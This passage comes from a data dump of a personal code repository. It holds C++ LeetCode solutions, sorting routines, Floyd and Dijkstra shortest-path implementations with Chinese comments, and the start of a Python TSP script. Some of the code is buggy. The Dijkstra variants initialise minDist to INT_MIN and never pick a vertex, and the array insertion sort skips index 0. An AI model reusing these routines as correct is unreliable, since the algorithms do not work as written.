res[1]))\r\n" }, { "alpha_fraction": 0.45602163672447205, "alphanum_fraction": 0.4736129939556122, "avg_line_length": 23.55172348022461, "blob_id": "54f041c7f468f99414aaa5a1c4fe8295535618db", "content_id": "671e15e246ba1ae3d09a47195927c62682ac94b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 755, "license_type": "no_license", "max_line_length": 70, "num_lines": 29, "path": "/leetcode/leetcode973.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 973.最接近原点的K个点\r\n\r\nclass Solution {\r\npublic:\r\n struct elem\r\n {\r\n vector<int> point;\r\n int dist;\r\n friend bool operator < (elem e1, elem e2) {\r\n return e1.dist >= e2.dist;\r\n }\r\n };\r\n vector<vector<int>> kClosest(vector<vector<int>>& points, int k) {\r\n priority_queue<elem> pq;\r\n vector<vector<int>>res;\r\n for(int i = 0; i < points.size(); i++){\r\n int temp = pow(points[i][0],2) + pow(points[i][1],2);\r\n pq.push({points[i],temp});\r\n }\r\n for(int i = 0; i < k; i++){\r\n res.push_back(pq.top().point);\r\n pq.pop();\r\n }\r\n return res;\r\n }\r\n};" }, { "alpha_fraction": 0.363778293132782, "alphanum_fraction": 0.37548789381980896, "avg_line_length": 28.452381134033203, "blob_id": "318718580cc626ff3539f25e1a7d982ba73c8482", "content_id": "07b19fcff3d54c10266b2f10f10b88707d59d2ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1345, "license_type": "no_license", "max_line_length": 72, "num_lines": 42, "path": "/leetcode/leetcode15.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 15.三数之和\r\n\r\nclass Solution {\r\npublic:\r\n vector<vector<int>> threeSum(vector<int>& nums) {\r\n vector<vector<int>> res;\r\n // 特判\r\n if(nums.size()<3) return res;\r\n sort(nums.begin(), nums.end());\r\n int i = 0;\r\n // 只要搜索到数组的倒数第三个就可以了,之后凑不齐3个数了\r\n while (i < nums.size()-2)\r\n {\r\n if(nums[i] > 0) return res;\r\n int left = i+1, right = nums.size()-1;\r\n while (left < right)\r\n {\r\n if(nums[i]+nums[left]+nums[right] == 0){\r\n res.push_back({nums[i],nums[left],nums[right]});\r\n while(left < right && nums[left] == nums[left+1]){\r\n left++;\r\n }\r\n while(left < right && nums[right] == nums[right-1]){\r\n right--;\r\n }\r\n left++;\r\n right--;\r\n } else if(nums[i]+nums[left]+nums[right] < 0){\r\n left++;\r\n } else right--;\r\n }\r\n while(i < nums.size()-2 && nums[i] == nums[i+1]){\r\n i++;\r\n }\r\n i++;\r\n }\r\n return res;\r\n }\r\n};\r\n\r\n" }, { "alpha_fraction": 0.38492199778556824, "alphanum_fraction": 0.3903883397579193, "avg_line_length": 26.3258056640625, "blob_id": "d6816a28c1b9602b686b1998e2aa0754c85615d8", "content_id": "9274e8eebd9d10310b5a166179777ebf12ed5d96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 10223, "license_type": "no_license", "max_line_length": 101, "num_lines": 310, "path": "/C/sorted.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<stdlib.h>\r\n#include<limits.h>\r\n#include<stdio.h>\r\n#include<vector>\r\n#include<algorithm>\r\nusing namespace std;\r\n\r\n\r\nstruct LinkNode\r\n {\r\n int key;\r\n LinkNode *next;\r\n LinkNode(int x) : key(x), next(NULL) {}\r\n }; \r\n\r\n\r\nclass sort_Insert //直接插入排序\r\n{ \r\npublic:\r\n\r\n /* 一、数组排序 */\r\n // 基本思想:从有序界开始与当前数字进行比较,如果比当前数字大,有序界数字向后移动\r\n void sort_InsertArray(int array[],int n) { \r\n int i , p;\r\n for (p = 1; p < n; p++) //排序界从1开始\r\n {\r\n int temp = array[p];\r\n for (i = p-1; i>0 && array[i]>temp ; i--)\r\n {\r\n array[i] = array[i-1]; //将比待排序数字大的数字都向后移一位\r\n }\r\n array[i] = temp;\r\n }\r\n }\r\n\r\n /*二、链表排序*/\r\n LinkNode* sort_InsertLink(LinkNode* head){\r\n if(head==NULL || head->next==NULL) return head;\r\n\r\n //定义伪头结点Tower\r\n LinkNode* Tower = new LinkNode(INT_MIN);\r\n Tower->next = head;\r\n\r\n //pre指向上一次移动的结点、end指向有序边界结点、now指向正在排序的结点\r\n LinkNode *pre=Tower, *end=Tower, *now=head;\r\n while (now)\r\n {\r\n if (now->key > end->key) //这种情况不变化\r\n {\r\n end = end->next;\r\n now = now->next;\r\n }\r\n else\r\n {\r\n if (now->key < pre->key) //正在排序的数比上次排序的数小,说明要进行移动,将pre置于头结点\r\n {\r\n pre = Tower;\r\n }\r\n while (pre->next && pre->next->key < now->key) //找到要操作的结点\r\n {\r\n pre = pre->next;\r\n }\r\n LinkNode* temp = now->next; //先保留下一个要操作的结点位置\r\n now->next = pre->next; //将正在排序的数与其后面的结点相连\r\n pre->next = now; //pre为上次移动的结点,因此置于正在操作的结点处\r\n end->next = temp; //有序界向后移动\r\n now = end->next; //更新正在操作的结点\r\n } \r\n }\r\n LinkNode* res = Tower->next;\r\n delete Tower;\r\n return res;\r\n }\r\n\r\n LinkNode* sort_InsertComplex(LinkNode* head){\r\n if (head==NULL || head->next==NULL) return head;\r\n LinkNode *Tower = new LinkNode(INT_MIN); // Tower是伪头结点,指向头结点\r\n Tower->next = head;\r\n LinkNode *p = Tower, *end = Tower, *cur = head; // p用于从头搜索数值,end用于确定已有序的区间,cur为正在排序的结点\r\n while (cur)\r\n {\r\n if (cur->key > end->key) // 这种情况顺序是合理的\r\n {\r\n end = end->next;\r\n cur = cur->next;\r\n }\r\n else \r\n {\r\n p = Tower; // 先将用于搜索的指针置于伪头\r\n while (p->next && p->next->key < cur->key)\r\n {\r\n p = p->next; // 找到要移动的结点\r\n } \r\n LinkNode *temp = cur->next; //正在排序部分的局部顺序应该是 head-->...->cur->p->...->end->temp->...\r\n cur->next = p->next; \r\n p->next = cur;\r\n end->next = temp;\r\n cur = end->next; \r\n } \r\n }\r\n return Tower->next; // 返回头结点\r\n }\r\n\r\n LinkNode* creatLink(){\r\n LinkNode *head = new LinkNode(INT_MIN);\r\n LinkNode *pre = new LinkNode(INT_MIN);\r\n pre = head;\r\n for (int i = 8; i >= 0; i--)\r\n {\r\n LinkNode *p = new LinkNode(0);\r\n p->key = i;\r\n pre->next = p;\r\n pre = p;\r\n }\r\n return head;\r\n }\r\n \r\n void print(LinkNode *head){\r\n while (head->next)\r\n {\r\n printf(\"%d \",head->next->key);\r\n head = head->next;\r\n }\r\n }\r\n};\r\n\r\nclass sort_Bubble //冒泡排序\r\n{\r\npublic:\r\n /*一、数组排序*/\r\n void sort_BubbleArray(int array[],int n){\r\n bool flag; // 指示是否发生元素移动,如果没发生,说明已经有序,终止排序\r\n for (int i = n-1; i >= 0; i--) //由于每轮排序将最大的数排至末尾,因此要指定末尾的位置\r\n {\r\n flag = false;\r\n for (int j = 0; j < i; j++)\r\n {\r\n if (array[j]>array[j+1])\r\n {\r\n int temp = array[j];\r\n array[j] = array[j+1];\r\n array[j+1] = temp;\r\n flag = true;\r\n } \r\n }\r\n if(!flag) break; \r\n } \r\n }\r\n\r\n /*二、链表排序*/\r\n LinkNode* sort_BubbleLink(LinkNode* head){\r\n LinkNode *pre, *cur, *tail;\r\n tail = NULL;\r\n while (head->next != tail) // 根据冒泡排序的特性,每次会将最大数排至最后,因此设置尾指针区分排序区\r\n {\r\n pre = head;\r\n cur = head->next; // cur表示正在排序的位置\r\n while (cur->next != tail) // 在有序区之前\r\n {\r\n if (cur->key > cur->next->key)\r\n {\r\n pre->next = cur->next;\r\n cur->next = pre->next->next;\r\n pre->next->next = cur;\r\n }\r\n else cur = cur->next;\r\n pre = pre->next; \r\n }\r\n tail = cur; // 每轮排序结束后更新界指针\r\n }\r\n return head; \r\n }\r\n};\r\n\r\nclass sort_Heap{ //堆排序\r\npublic:\r\n // 将以root为根的子树调整为大根堆\r\n void heap_Adjust(int array[],int root,int n){ \r\n int parent, child;\r\n int temp;\r\n temp = array[root]; // 每次比较是用传入的root节点的值与各个孩子节点进行比较\r\n for (parent = root; parent*2+1 < n; parent=child)\r\n {\r\n child = parent * 2 + 1;\r\n if (child!=n-1 && array[child]<array[child+1]) // 找出左右孩子的最大孩子\r\n child++;\r\n if (temp >= array[child]) break; //判断孩子值是否大于根值\r\n else\r\n {\r\n array[parent] = array[child];\r\n } \r\n }\r\n array[parent] = temp; // 最后剩下的空位就是parent的值应在的位置 \r\n }\r\n\r\n // 根据堆进行排序\r\n void sort_heap(int array[], int n){\r\n int i;\r\n for (i = n/2-1; i >= 0; i--) // 无序数组建堆\r\n {\r\n heap_Adjust(array,i,n);\r\n }\r\n for (i = n-1; i > 0; i--) // 弹出顶元素(排序过程)\r\n {\r\n int temp = array[0]; // 每次将待排序列最大值移至尾部,再重建堆,直到堆清空\r\n array[0] = array[i];\r\n array[i] = temp; \r\n heap_Adjust(array,0,i);\r\n } \r\n }\r\n};\r\n\r\nclass sort_Shell // 希尔排序\r\n{\r\npublic:\r\n void sort_shellArray(int array[],int n){\r\n int gap = n;\r\n int i, j, temp;\r\n for (gap>>=2; gap>0; gap>>=2){\r\n for (i = gap; i < n; i++)\r\n {\r\n j = 0;\r\n temp = array[i];\r\n for (j = i-gap; j>=0 && temp<array[j]; j = j-gap)\r\n {\r\n array[j + gap] = array[j];\r\n }\r\n array[j + gap] = temp;\r\n }\r\n }\r\n } \r\n};\r\n\r\nclass sort_Select // 直接选择排序\r\n{\r\npublic:\r\n void sort_SelectArray(int array[], int n){\r\n int index;\r\n int val;\r\n for (int i = 0; i < n-1; i++)\r\n {\r\n val = array[i];\r\n index = i;\r\n for (int j = i;j < n;j++)\r\n {\r\n if (array[j] < val)\r\n {\r\n index = j;\r\n val = array[j];\r\n }\r\n }\r\n int temp = array[i];\r\n array[i] = array[index];\r\n array[index] = temp;\r\n } \r\n }\r\n};\r\n\r\nclass sort_Quick{ // 快速排序\r\npublic:\r\n // 选定基准值\r\n int partition(int array[],int low,int high){\r\n int pivot = array[high]; // 取最后一个值作基准\r\n int i = low - 1; // i是小元素指针,j是大元素指针\r\n //j从数组头部开始,每发现一个比基准小的数,就将它换至i处\r\n //i每接受一个最小数,就+1,可以理解为开新格子放东西\r\n for (int j = low; j < high; j++)\r\n {\r\n if (array[j] <= pivot)\r\n {\r\n i++;\r\n int temp = array[i];\r\n array[i] = array[j];\r\n array[j] = temp;\r\n }\r\n }\r\n //在这里,i指向的是最靠近中部的比基准数小的值\r\n //i+1是第一个比基准数大的值,因此让其与基准交换,便可区分大小\r\n int temp = array[i+1];\r\n array[i+1] = array[high];\r\n array[high] = temp;\r\n return i+1; \r\n }\r\n // 快速排序 , 递归\r\n void sort_quick(int array[],int left,int right){\r\n if (left < right){\r\n int p = partition(array,left,right);\r\n sort_quick(array,left,p-1);\r\n sort_quick(array,p+1,right);\r\n } \r\n }\r\n};\r\n\r\nclass sort_Bucket{ // 桶排序\r\npublic:\r\n void sort_BucketArray(int array[],int n){\r\n vector<int> vec[n];\r\n for (int i = 0; i < n; i++){\r\n int bi = array[i];\r\n vec[bi].push_back(array[i]);\r\n }\r\n for (int i = 0; i < n; i++)\r\n sort(vec[i].begin(),vec[i].end());\r\n \r\n int index = 0;\r\n for (int i = 0; i < n; i++)\r\n for (int j = 0;j < vec[i].size(); j++)\r\n array[index++] = vec[i][j];\r\n }\r\n};\r\n" }, { "alpha_fraction": 0.3597733676433563, "alphanum_fraction": 0.39376771450042725, "avg_line_length": 17.61111068725586, "blob_id": "1ee0dd284729a04b4ad926c8fec98aca6f34b856", "content_id": "e351c8975ae54edc97d1f75831cd4a11d577b67e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 357, "license_type": "no_license", "max_line_length": 36, "num_lines": 18, "path": "/leetcode/leetcode263.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 263.丑数\r\n\r\nclass Solution {\r\npublic:\r\n bool isUgly(int n) {\r\n if(n <= 0) return false;\r\n int arr[3] = {2,3,5};\r\n for(int i = 0;i < 3;i++){\r\n while(n % arr[i] == 0) {\r\n n /= arr[i];\r\n }\r\n }\r\n return n == 1;\r\n }\r\n};\r\n" }, { "alpha_fraction": 0.3565604090690613, "alphanum_fraction": 0.36767977476119995, "avg_line_length": 21.59649085998535, "blob_id": "e252216e46a6114ad286216bf57ee3bf37bb6fda", "content_id": "06c4d4436e57aae375667a866ce2a8e6c3a6770d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1517, "license_type": "no_license", "max_line_length": 102, "num_lines": 57, "path": "/C/Floyd.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\n#include<algorithm>\r\nusing namespace std;\r\n\r\n/*\r\n原理:\r\n 如果有一个点 K ,使得 i-->K-->j 的距离小于 i-->j 的距离\r\n 则:用点 K作为点(i,j)的中介点\r\n\r\n伪代码:\r\n void Floyd() {\r\n 枚举顶点 K:\r\n 以 K作为中介点,枚举顶点 i,j:\r\n if (dist[i][k] + dist[k][j] < dist[i][j])\r\n {\r\n dist[i][j] = dist[i][k] + dist[k][j]\r\n }\r\n }\r\n*/\r\n\r\nconst int MAX = 200;\r\nint n, m;\r\nint dist[MAX][MAX]; // 默认为 INT_MAX\r\n\r\n// 算法\r\nvoid Floyd() {\r\n for (int k = 0; k < n; k++)\r\n for (int i = 0; i < n; i++)\r\n for (int j = 0; j < n; j++)\r\n if(dist[i][k] != INT_MAX && dist[k][j] != INT_MAX && dist[i][k]+dist[k][j]<dist[i][j])\r\n dist[i][j] = dist[i][k] + dist[k][j];\r\n}\r\n\r\nint main() {\r\n int x,y,w;\r\n fill(dist[0],dist[0]+MAX*MAX,INT_MAX);\r\n scanf(\"%d%d\",&n,&m); // 顶点数与边数\r\n for (int i = 0; i < n; i++){ \r\n // 点到自己的距离为 0\r\n dist[i][i] = 0;\r\n }\r\n for (int i = 0; i < m; i++)\r\n {\r\n // 输入边的权重与边的两顶点\r\n scanf(\"%d%d%d\",&x,&y,&w);\r\n dist[x][y] = w;\r\n }\r\n Floyd();\r\n for (int i = 0; i < n; i++){\r\n for (int j = 0; j < n; j++){\r\n if (dist[i][j] != INT_MAX)\r\n printf(\"%d--%d = %d\\n\",i,j,dist[i][j]);\r\n }\r\n // printf(\"\\n\");\r\n } \r\n return 0;\r\n}\r\n\r\n\r\n" }, { "alpha_fraction": 0.455798864364624, "alphanum_fraction": 0.4785076975822449, "avg_line_length": 26.674419403076172, "blob_id": "0478152d4d679012e510c1348f0ba7c427e3d1e9", "content_id": "ee2f011a2effab6277776e447650cab7a10552da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1247, "license_type": "no_license", "max_line_length": 63, "num_lines": 43, "path": "/leetcode/leetcode23.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 23.合并k个升序链表\r\n\r\nstruct ListNode {\r\n int val;\r\n ListNode *next;\r\n ListNode() : val(0), next(nullptr) {}\r\n ListNode(int x) : val(x), next(nullptr) {}\r\n ListNode(int x, ListNode *next) : val(x), next(next) {}\r\n};\r\n\r\nclass Solution {\r\npublic:\r\n ListNode* mergeKLists(vector<ListNode*>& lists) {\r\n ListNode *tower = nullptr;\r\n for(int i = 0; i < lists.size(); i++){\r\n tower = mergeTwoLists(tower,lists[i]);\r\n }\r\n return tower;\r\n }\r\n\r\n ListNode* mergeTwoLists(ListNode* l1, ListNode* l2) {\r\n if(l1 == nullptr && l2 != nullptr) return l2;\r\n else if(l1 != nullptr && l2 == nullptr) return l1;\r\n else if(l1 == nullptr && l2 == nullptr) return nullptr;\r\n ListNode *head = new ListNode(1);\r\n ListNode *ret = head;\r\n while (l1 != NULL && l2 != NULL){\r\n if (l1->val <= l2->val){\r\n ret->next = l1;\r\n l1 = l1->next;\r\n } else{\r\n ret->next = l2;\r\n l2 = l2->next;\r\n }\r\n ret = ret->next;\r\n }\r\n ret->next = l1 == NULL ? l2 : l1;\r\n return head->next;\r\n }\r\n};\r\n" }, { "alpha_fraction": 0.5370370149612427, "alphanum_fraction": 0.5555555820465088, "avg_line_length": 17.81818199157715, "blob_id": "ae7353ca375c558d969154c2ba545c98a7f8cb8a", "content_id": "b37c54e78ff24b82b35aff1c9a03990cce201e95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 238, "license_type": "no_license", "max_line_length": 63, "num_lines": 11, "path": "/leetcode/leetcode_sword65.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 剑指offer-65. 不用加减乘除做加法\r\n\r\nclass Solution {\r\npublic:\r\n int add(int a, int b) {\r\n return b == 0 ? a : add(a^b, (unsigned int)(a&b) << 1);\r\n }\r\n};" }, { "alpha_fraction": 0.3787755072116852, "alphanum_fraction": 0.38938775658607483, "avg_line_length": 23.040817260742188, "blob_id": "7e830d55345b4839e0a83c7f6f0081f5dfe5a359", "content_id": "190352669cbd1c165fecd0540815af5bf418bbe8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1579, "license_type": "no_license", "max_line_length": 70, "num_lines": 49, "path": "/leetcode/leetcode880.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 880. 索引处的解码字符串\r\n\r\n/*\r\n思路:\r\n1.首先遍历整个字符串,记录最终字符串的长度:\r\n 若当前解析出的字符串长度 < K,继续解析;\r\n 若 > K,停止解析\r\n2. 当前字符串长度为 sum>K\r\n 从停止解析前最后遍历的字符 S[i] 开始回退:\r\n 若该字符c为数字,则 sum/c(因为说明总长度遇到这个数字后重复了c遍)\r\n 若 sum/c < K,说明第 K位在 sum/c ~ sum这段区间内,且结果字符存在于 sum/c这段字符串内;\r\n 则 K %= (sum/c) ,如果 K=0,则退出搜索,结果为 S[i]\r\n 若该字符c为字母,则 sum--\r\n i--\r\n 当前字符串长度 sum == K,退出搜索,结果为 S[i]\r\n3. \r\n\r\n*/\r\n\r\nclass Solution {\r\npublic:\r\n string decodeAtIndex(string S, int K) {\r\n string ans;\r\n int n = S.length();\r\n long sum = 0, i = 0; \r\n for (; i < n; i++) { \r\n if (isalpha(S[i])) sum++;\r\n else { sum *= (S[i] - '0'); }\r\n if (sum >= K) break;\r\n }\r\n for (; i >= 0; i--) {\r\n if (sum > K){\r\n if (isdigit(S[i])) {\r\n sum /= (S[i] - '0');\r\n if (K > sum){\r\n K %= sum;\r\n if (K == 0) break;\r\n }\r\n } else sum--;\r\n } else if (sum == K) break;\r\n }\r\n while (isdigit(S[i])) i--;\r\n ans += S[i];\r\n return ans;\r\n }\r\n};" }, { "alpha_fraction": 0.3832857012748718, "alphanum_fraction": 0.39500001072883606, "avg_line_length": 21.72881317138672, "blob_id": "cce2ef1bacd7d81b3ed5ddbc881795aa599591d1", "content_id": "9ba38ea2d309717fc3742a9b98dfb3d1d29299c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 8664, "license_type": "no_license", "max_line_length": 108, "num_lines": 295, "path": "/C/dijkstra.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n#define MAX 500\r\n\r\n/* dijkstra 计算最短距离的伪代码\r\n\r\n#define MAX 500\r\nint Graph[MAX][MAX];\r\nint dist[MAX]; \r\nbool visit[MAX];\r\n\r\nvoid dijkstra(int start)\r\n{\r\n 初始化dist (1) \r\n for(循环n次) \r\n {\r\n u = dist[MAX]中最小且没被访问过的顶点 (2)\r\n visit[u] = true\r\n for(从u出发能到达的所有顶点k) (3)\r\n {\r\n if(k没被访问过 && 以u为中转点的start-->k的距离比dist[k]小) (4)\r\n {\r\n 更新dist[k] (5)\r\n }\r\n }\r\n }\r\n}\r\n*/\r\n\r\nint Graph[MAX][MAX];\r\nint dist[MAX];\r\nbool visit[MAX];\r\n\r\nvoid dijkstra_1(int start){ // dijkstra计算最短距离\r\n\r\n // (1). 初始化dist\r\n fill(dist,dist+MAX,INT_MAX); \r\n dist[start] = 0;\r\n\r\n // (2).找到dist[]中最小且没被访问过的点\r\n\r\n for(int i = 0; i < MAX;i++)\r\n {\r\n int u = -1, minDist = INT_MIN;\r\n for(int j = 0;j < MAX;j++)\r\n {\r\n if(!visit[j] && dist[j]<minDist)\r\n {\r\n u = j;\r\n minDist = dist[j];\r\n }\r\n }\r\n \r\n // (3). 如果找不到更小的dist[],说明不连通,如果找到,则标记visit[u]为true\r\n if(u == -1) return;\r\n visit[u] = true;\r\n\r\n // (4). 遍历从u能到达的所有点并更新dist[]\r\n for(int k = 0;k < MAX;k++)\r\n {\r\n // k没被访问过 && u与k之间是连通的 && “起点-->u-->k”的距离比现有的“起点-->k”更短\r\n if(!visit[k] && Graph[u][k]!=INT_MAX && dist[u] + Graph[u][k] < dist[k])\r\n {\r\n dist[k] = dist[u] + Graph[u][k];\r\n }\r\n }\r\n }\r\n}\r\n\r\n\r\n/* 修改: dijkstra 解最短路径\r\n\r\n需要增添一个 preNode[MAX],记录点k的前驱\r\n代码上只需要在第一部分伪代码的序号(5)后面增加一条:\r\n\r\n \"令k的前驱为u\" (6)\r\n\r\nvoid dijkstra(int start)\r\n{\r\n 初始化dist (1) \r\n for(循环n次) \r\n {\r\n u = dist[MAX]中最小且没被访问过的顶点 (2)\r\n visit[u] = true\r\n for(从u出发能到达的所有顶点k) (3)\r\n {\r\n if(k没被访问过 && 以u为中转点的start-->k的距离比dist[k]小) (4)\r\n {\r\n 更新dist[k] (5)\r\n 令k的前驱为u (6)\r\n }\r\n }\r\n }\r\n}\r\n\r\n但是preNode中得到的是每个顶点的直接前驱,想要得到完整的最短路径,需要用 DFS不断递归寻找前驱,直到到达 start\r\n\r\n*/\r\n\r\nint preNode[MAX];\r\n\r\nvoid dijkstra_2(int start)\r\n{\r\n // (1)初始化 dist[] 和 preNode[]\r\n fill(dist,dist+MAX,INT_MAX);\r\n dist[start] = 0;\r\n for(int i = 0;i < MAX;i++) preNode[i] = i;\r\n\r\n // (2).找到dist[]中最小且没被访问过的点\r\n for(int i = 0; i < MAX;i++)\r\n {\r\n int u = -1, minDist = INT_MIN;\r\n for(int j = 0;j < MAX;j++)\r\n {\r\n if(!visit[j] && dist[j]<minDist)\r\n {\r\n u = j;\r\n minDist = dist[j];\r\n }\r\n }\r\n \r\n // (3). 如果找不到更小的dist[],说明不连通,如果找到,则标记visit[u]为true\r\n if(u == -1) return;\r\n visit[u] = true;\r\n\r\n // (4). 遍历从u能到达的所有点并更新dist[]\r\n for(int k = 0;k < MAX;k++)\r\n {\r\n // k没被访问过 && u与k之间是连通的 && “起点-->u-->k”的距离比现有的“起点-->k”更短\r\n if(!visit[k] && Graph[u][k]!=INT_MAX && dist[u] + Graph[u][k] < dist[k])\r\n {\r\n dist[k] = dist[u] + Graph[u][k];\r\n preNode[k] = u; // 更新前驱\r\n }\r\n } \r\n } \r\n}\r\n\r\n\r\n/* 附加条件:如果对每条边增加一个边权(额外开销),求在最短路径有多少条时要求路径上的花费之和最大/小\r\n\r\n新增一个开销矩阵 Cost[MAX][MAX]\r\n并对第一段伪代码的序号 (3)修改\r\n*/\r\n\r\nint C[MAX][MAX];\r\nint cost[MAX];\r\n\r\nvoid dijkstra_3(int start)\r\n{\r\n // (1)初始化 dist[] \r\n fill(dist,dist+MAX,INT_MAX);\r\n dist[start] = 0;\r\n\r\n // (2).找到dist[]中最小且没被访问过的点\r\n for(int i = 0; i < MAX;i++)\r\n {\r\n int u = -1, minDist = INT_MIN;\r\n for(int j = 0;j < MAX;j++)\r\n {\r\n if(!visit[j] && dist[j]<minDist)\r\n {\r\n u = j;\r\n minDist = dist[j];\r\n }\r\n }\r\n \r\n // (3). 如果找不到更小的dist[],说明不连通,如果找到,则标记 visit[u]为 true\r\n if(u == -1) return;\r\n visit[u] = true;\r\n\r\n // (4).在更新 dist[] 的同时,更新 cost[]\r\n for(int k = 0;k < MAX;k++)\r\n {\r\n if(!visit[k] && Graph[u][k] != INT_MAX)\r\n {\r\n if(dist[u] + Graph[u][k] < dist[k]) // 先找最短距离\r\n {\r\n dist[k] = dist[u] + Graph[u][k];\r\n cost[k] = cost[u] + C[u][k];\r\n } \r\n else if(dist[u] + Graph[u][k] == dist[k] && cost[u] + C[u][k] < cost[k]){ // 是最短距离,但开销更小/大\r\n cost[k] = cost[u] + C[u][k];\r\n }\r\n }\r\n }\r\n }\r\n}\r\n\r\n/* 附加条件:如果对每个点都增加点权,球最短路径有多条时,要求点权之和最大\r\n与上面的边权类似,依然对(3)修改,增加一个 W[MAX],每次在更新最短距离时更新 weight[]\r\n\r\n*/\r\n\r\nint W[MAX];\r\nint weight[MAX];\r\n\r\nvoid dijkstra_4(int start)\r\n{\r\n // (1)初始化 dist[] \r\n fill(dist,dist+MAX,INT_MAX);\r\n dist[start] = 0;\r\n\r\n // (2).找到dist[]中最小且没被访问过的点\r\n for(int i = 0; i < MAX;i++)\r\n {\r\n int u = -1, minDist = INT_MIN;\r\n for(int j = 0;j < MAX;j++)\r\n {\r\n if(!visit[j] && dist[j]<minDist)\r\n {\r\n u = j;\r\n minDist = dist[j];\r\n }\r\n }\r\n \r\n // (3). 如果找不到更小的dist[],说明不连通,如果找到,则标记 visit[u]为 true\r\n if(u == -1) return;\r\n visit[u] = true;\r\n\r\n // (4).在更新 dist[] 的同时,更新 cost[]\r\n for(int k = 0;k < MAX;k++)\r\n {\r\n if(!visit[k] && Graph[u][k] != INT_MAX)\r\n {\r\n if(dist[u] + Graph[u][k] < dist[k]) // 先找最短距离\r\n {\r\n dist[k] = dist[u] + Graph[u][k];\r\n weight[k] = weight[u] + W[k];\r\n } \r\n else if(dist[u] + Graph[u][k] == dist[k] && weight[u] + W[k] < weight[k]){ // 是最短距离,但开销更小/大\r\n weight[k] = weight[u] + W[k];\r\n }\r\n }\r\n } \r\n } \r\n}\r\n\r\n/* 附加: 当最短路径不止一条,求最短路径条数\r\n增加一个记录 start-->u 的最短路径条数的数组 roadNum[MAX]\r\n初始条件下,roadNum[start]=1,其它为0;\r\n每次更新最短距离时,令 roadNum[k]继承 roadNum[u];\r\n当最短距离相同,将 roadNum[u] 加到 roadNum[k]上\r\n\r\n修改的位置依旧是 (3)\r\n\r\n*/\r\n\r\nint roadNum[MAX];\r\n\r\nvoid dijkstra_5(int start)\r\n{\r\n // (1)初始化 dist[] ,roadNum[]\r\n fill(dist,dist+MAX,INT_MAX);\r\n fill(roadNum,roadNum+MAX,0);\r\n dist[start] = 0;\r\n roadNum[start] = 1;\r\n\r\n\r\n // (2).找到dist[]中最小且没被访问过的点\r\n for(int i = 0; i < MAX;i++)\r\n {\r\n int u = -1, minDist = INT_MIN;\r\n for(int j = 0;j < MAX;j++)\r\n {\r\n if(!visit[j] && dist[j]<minDist)\r\n {\r\n u = j;\r\n minDist = dist[j];\r\n }\r\n }\r\n \r\n\r\n // (3). 如果找不到更小的dist[],说明不连通,如果找到,则标记 visit[u]为 true\r\n if(u == -1) return;\r\n visit[u] = true;\r\n\r\n // (4).在判定计算最短距离后更新最短路径条数\r\n for(int k = 0;k < MAX;k++)\r\n {\r\n if(!visit[k] && Graph[u][k] != INT_MAX)\r\n {\r\n if(dist[u] + Graph[u][k] < dist[k])\r\n {\r\n dist[k] = dist[u] + Graph[u][k];\r\n roadNum[k] = roadNum[u];\r\n }\r\n else if(dist[u] + Graph[u][k] == dist[k])\r\n {\r\n roadNum[k] = roadNum[k] + roadNum[u];\r\n }\r\n }\r\n }\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.4045138955116272, "alphanum_fraction": 0.4149305522441864, "avg_line_length": 23.130434036254883, "blob_id": "464c735279187bfe7f19fa980532a30569e74a95", "content_id": "0ab36f214c9094317620621a94ef11484f06d70a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 588, "license_type": "no_license", "max_line_length": 61, "num_lines": 23, "path": "/leetcode/leetcode14.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 14.最长公共子串\r\n\r\nclass Solution {\r\npublic:\r\n string longestCommonPrefix(vector<string>& strs) {\r\n if(strs.size() == 0) return \"\";\r\n string res = \"\", first = strs[0];\r\n char c;\r\n for(int i = 0;i < first.length();i++){\r\n c = first[i];\r\n for(int j = 1;j < strs.size();j++){\r\n if(i == strs[j].length() || strs[j][i] != c){\r\n return res;\r\n }\r\n }\r\n res += c;\r\n }\r\n return res;\r\n }\r\n};" }, { "alpha_fraction": 0.4541501998901367, "alphanum_fraction": 0.47648221254348755, "avg_line_length": 25.351350784301758, "blob_id": "51a4edb2743f0c0e6d6d619781fe659ef3d3e9a1", "content_id": "cf0bfe46eab98ae23ba35954b7132d4f31fd562f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5463, "license_type": "no_license", "max_line_length": 116, "num_lines": 185, "path": "/python/TSP_GA.py", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "import numpy as 